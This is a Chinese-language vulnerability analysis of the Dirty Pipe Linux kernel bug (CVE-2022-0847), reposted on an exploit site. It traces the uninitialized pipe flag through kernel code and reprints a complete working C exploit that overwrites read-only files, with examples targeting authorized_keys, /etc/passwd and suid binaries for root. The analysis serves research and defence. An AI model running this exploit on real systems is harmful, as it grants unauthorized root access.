Exploit for Improper Initialization in Linux Linux_Kernel CVE-2022-0847

Name: Exploit for Improper Initialization in Linux Linux_Kernel CVE-2022-0847
Rating: 5 (515 reviews)
2022-03-10 | CVSS 7.8
## https://sploitus.com/exploit?id=05772ECE-A777-5C16-8AE4-25697DCA9E81
# CVE-2022-0847 Dirty Pipe linux内核提权分析

[toc]

本文首发于华为安全公众号，这是博客版(比较完整)

首发链接:https://mp.weixin.qq.com/s/6VhWBOzJ7uu80nzFxe5jpg

## 漏洞简介

漏洞编号: CVE-2022-0847 (别名: 脏管道dirty pipe)

漏洞产品: linux kernel - splice syscall

影响版本: linux 5.8 补丁 [f6dd975583bd](https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958) 引入~ 5.16.11、5.15.25、5.10.102 修复

漏洞危害: 对任意可读文件写不超过一页的内容(足够了)，可本地提权。

## 环境搭建

漏洞分析docker：[chenaotian/cve-2022-0847](https://registry.hub.docker.com/r/chenaotian/cve-2022-0847) (如果还访问不了那就是我还没做好传上去)

提供了：

- 编译的有漏洞的可调式内核5.13
- qemu 、gdb、linux 内核5.13源码
- exp

启动：

```shell
cd ~/cve-2022-0847
gcc exp.c -o exp --static && cp exp ./rootfs && cd rootfs
find . | cpio -o --format=newc > ../rootfs.img
cd ../ 
./boot.sh
```

调试：

```
gdb ./vmlinux
target remote :10086
directory /root/linux-5.13
b do_splice
b copy_page_to_iter_pipe 
b pipe_write
ignore 3 15
...
p *(struct pipe_inode_info *) pipe
p (struct pipe_buffer)pipe->bufs[0]
```

## 漏洞原理

> 漏洞简要原理是，调用`splice` 函数可以通过"零拷贝"的形式将文件发送到`pipe`，代码层面的零拷贝是直接将文件缓存页(page cache)作为`pipe` 的`buf`页使用。但这里引入了一个变量未初始化漏洞，导致文件缓存页会在后续`pipe` 通道中被当成普通`pipe`缓存页而被"续写"进而被篡改。然而，在这种情况下，内核并不会将这个缓存页判定为"脏页"，短时间内(到下次重启之类的)不会刷新到磁盘。在这段时间内所有访问该文件的场景都将使用被篡改的文件缓存页，也就达成了一个"短时间内对任意可读文件任意写"的操作。可以完成本地提权。

### 漏洞发生点

根据补丁，漏洞发生点位于`copy_page_to_iter_pipe` 函数，增加了对`buf->flags`的初始化操作，所以这是一个变量未初始化漏洞。

![image-20220308170149137](img/image-20220308170149137.png)

`copy_page_to_iter_pipe`  的调用点出现在 `splice` 系统调用之中。`splice` 函数(系统调用)通过一种"零拷贝"的方法将文件内容输送到管道之中。相比传统的直接将文件内容送入管道性能更好。具体在下文介绍。

### pipe原理与pipe_write

首先，漏洞别名脏管道，先了解一下管道(`pipe`)。`pipe` 是内核提供的一个通信管道，通过`pipe/pipe2` 函数创建，返回两个文件描述符，一个用于发送数据，另一个用于接受数据，类似管道的两段，具体使用不多bb。

![image-20220309124007780](img/image-20220309124007780.png)

简单说一下在内核中的实现，通常pipe 缓存空间总长度65536 字节用页的形式进行管理，总共16页(一页4096字节)，页面之间并不连续，而是通过数组进行管理，形成一个环形链表。维护两个链表指针，一个用来写(`pipe->head`)，一个用来读(`pipe->tail`)，这里主要分析一下`pipe_write` 函数：

linux-5.13\fs\pipe.c : 400 : pipe_write

```c
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	··· ···
    ··· ···
	head = pipe->head;
	was_empty = pipe_empty(head, pipe->tail);
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) { 
        //[1]pipe 缓存不为空，则尝试是否能从当前最后一页"接着"写
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) { 
            /*[2]关键，如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在，代表该页允许接着写
             *如果写入长度不会跨页，则接着写，否则直接另起一页 */
			ret = pipe_buf_confirm(pipe, buf);
			···
			ret = copy_page_from_iter(buf->page, offset, chars, from);
			···
			}
			buf->len += ret;
			···
		}
	}

	for (;;) {//[3]如果上一页没法接着写，则重新起一页
		··· ···
		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) {//[4]重新申请一个新页
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			spin_lock_irq(&pipe->rd_wait.lock);

			head = pipe->head;
			··· ···
			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;//[5]将新申请的页放到页数组中
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp))
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            	//[6]设置flag，默认PIPE_BUF_FLAG_CAN_MERGE
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 
            //[7]拷贝操作
			··· ···
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			··· ···
		}
        ··· ···
    }
	··· ···
	return ret;
}
```

1. 如果当前管道(`pipe`)中不为空(`head==tail`判定为空管道)，则说明现在管道中有未被读取的数据，则获取`head` 指针，也就是指向最新的用来写的页，查看该页的`len`、`offset`(为了找到数据结尾)。接下来尝试在当前页面续写
2. 判断 **当前页面是否带有 `PIPE_BUF_FLAG_CAN_MERGE` `flag`标记，如果不存在则不允许在当前页面续写**。或当前写入的数据拼接在之前的数据后面长度超过一页(即写入操作跨页)，如果跨页，则无法续写。
2. 如果无法在上一页续写，则另起一页
2. `alloc_page` 申请一个新的页
2. 将新的页放在数组最前面(可能会替换掉原有页面)，初始化值。
2. `buf->flag` 默认初始化为`PIPE_BUF_FLAG_CAN_MERGE` ，因为默认状态是允许页可以续写的。
2. 拷贝写入的数据，没拷贝完重复上述操作。

漏洞利用的关键就是在`splice` 中未被初始化的`PIPE_BUF_FLAG_CAN_MERGE`  `flag`标记，这代表我们能否在一个"没写完"的`pipe` 页续写。

### splice到copy_page_to_iter_pipe 

上面提到了，`pipe` 就是通过管理16 个页来作为缓存。`splice` 的零拷贝方法就是，直接用文件缓存页来替换`pipe` 中的缓存页(更改pipe缓存页指针指向文件缓存页)。

![image-20220309124515813](img/image-20220309124515813.png)

`splice` 系统调用到漏洞函数`copy_page_to_iter_pipe` 调用栈很深，具体不详细分析，调用栈如下：

- `SYSCALL_DEFINE6(splice,...)` -> `__do_sys_splice` ->  `__do_splice`-> `do_splice`
  - `splice_file_to_pipe` -> `do_splice_to`
    - `generic_file_splice_read`(`in->f_op->splice_read` 默认为 `generic_file_splice_read`)
      - `call_read_iter` -> `filemap_read`
        - `copy_page_to_iter` -> `copy_page_to_iter_pipe`

漏洞所在的`copy_page_to_iter_pipe` 函数主要做的工作就是将`pipe` 缓存页结构指向要传输的文件的文件缓存页：

linux-5.13\lib\iov_iter.c : 417 : copy_page_to_iter_pipe

```c
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	··· ···

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];//[1]获取对应的pipe 缓存页
	··· ···
	
	buf->ops = &page_cache_pipe_buf_ops;//[2]修改pipe 缓存页的相关信息指向文件缓存页
	get_page(page);
	buf->page = page;//[2]页指针指向了文件缓存页
	buf->offset = offset;//[2]offset len 等设置为当前信息(通过splice 传入参数决定)
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}
```

1. 首先根据`pipe` 页数组环形结构，找到当前写指针(`pipe->head`) 位置
2. 将当前需要写入的页指向准备好的文件缓存页，并设置其他信息，比如`len` 是由`splice` 系统调用的传入参数决定的。这里唯独没有初始化flag，造成漏洞。

一般初始化完`pipe->bufs`长这样：

![image-20220308165052936](img/image-20220308165052936.png)

这时根据上面分析过的`pipe_write` 代码，如果重新调用`pipe_write` 向`pipe` 中写数据，写指针(`pipe->head`)  指向上图中的页，`flag` 为 `PIPE_BUF_FLAG_CAN_MERGE` ，则会认为可以接着该页继续写，只要写入长度不跨页：

```c
#define PIPE_BUF_FLAG_CAN_MERGE	0x10	/* can merge buffers */

if (chars && !was_empty) { 
        //[1]pipe 缓存不为空，则尝试是否能从当前最后一页"接着"写
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
                offset + chars <= PAGE_SIZE) { 
                /*[2]关键，如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在，代表该页允许接着写
                 *如果写入长度不会跨页，则接着写，否则直接另起一页 */
                ret = pipe_buf_confirm(pipe, buf);
                ···
                ret = copy_page_from_iter(buf->page, offset, chars, from);
```

### linux 内核page cache机制

linux 通过将打开的文件放到缓存页之中，缓存页被使用过后也会保存一段时间避免不必要的IO操作。短时间内访问同一个文件，都会操作相同的文件缓存页，而不是反复打开。而我们通过该方法篡改了这个文件缓存页，则短时间内访问(读取)该文件的操作都会读到被我们篡改的文件缓存页上，完成利用。

## 漏洞利用

上面已经描述过了，漏洞利用过程非常简单，看懂漏洞原理即可利用。根据作者的操作，大概分为以下几步：

1. 创建一个管道
2. 将管道填充满(通过`pipe_write`)，这样所有的`buf`(`pipe` 缓存页)都初始化过了，`flag` 默认初始化为`PIPE_BUF_FLAG_CAN_MERGE`
3. 将管道清空(通过`pipe_read`)，这样通过`splice` 系统调用传送文件的时候就会使用原有的初始化过的`buf `结构。
4. 调用`splice` 函数将想要篡改的文件传送入
5. 继续向`pipe`写入内容(`pipe_write`)，这时就会覆盖到文件缓存页了，完成暂时文件篡改。

### 细节调试

第二步结束，管道填满又清空之后，可以看到bufs 结构中就是接下来未初始化内容要复用的数据：

```
p *(struct pipe_inode_info *) pipe
p (struct pipe_buffer)pipe->bufs[0]
```

![image-20220308173705037](img/image-20220308173705037.png)

`splice` 之后文件传入之后，变为，其中`flag` 未被初始化，并且这里`len` 要设置的尽量小，因为越小我们后续"续写"时能写的长度就越长，这里设置为1，偏移为我们想要篡改的起始地址，这里会将`pipe->bufs->page` 指针指向起始地址:

```
splice(fd, &offset, p[1], NULL, 1, 0);
```

![image-20220308165052936](img/image-20220308165052936.png)

再一次`pipe_write`，满足续写条件，直接在页面续写：

![image-20220308174556226](img/image-20220308174556226.png)

### exp

不是我写的，漏洞披露之中的：

```c
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}
```

提权成功：

```shell
gcc exp.c -o exp --static
./exp file offset string
```

![image-20220308172336511](img/image-20220308172336511.png)

目前是演示了任意文件写的效果，具体利用可以修改/etc/passwd、或者sshkey 或者一些suid 文件之类的完成实际提权。这里不实际操作了(反正我又不去渗透)。

### 一些小限制(无伤大雅)

1. 无法改变文件大小(无法让文件更大)
2. 单次写入长度不能超过一页(4k)

## 缓解措施

### 建议方案

由于是内核漏洞，暂无很好的处置方案，建议升级内核到修复的版本: 5.16.11、5.15.25、5.10.102及以上。

### 漏洞验证(工具)

根据漏洞披露者发布的POC，写了一个简单的验证工具。存在漏洞输出"There is CVE-2022-0847"：

![image-20220308202244668](img/image-20220308202244668-16467449237121.png)

不存在漏洞输出"You are safe!"。

## 参考

漏洞披露：https://dirtypipe.cm4all.com/

## 阴谋论

`PIPE_BUF_FLAG_CAN_MERGE` 这个`flag` 总共就出现了5次，一次`#define` 声明，两次在`pipe_write` 里。剩下两次都在`splice` 之中：

![image-20220308211006312](img/image-20220308211006312.png)

而且根据这个变量参与的代码可知，这个变量的意义就是是否允许在当前最新`pipe` 缓存页中续写；一般`pipe` 自己申请的页，就是个普通页，续写就续写很正常。什么情况不能续写，那就是这个页不是你`pipe` 自己申请的页，你不可以随便改。所以由目前的状况来看，几乎也就`splice` 中涉及到了非`pipe` 自己申请的页。换言之，**`PIPE_BUF_FLAG_CAN_MERGE` 这个`flag` 就是为`splice` 设计的。然后你告诉我你不初始化的吗？**

所以我怀疑这漏洞，根本不是马虎....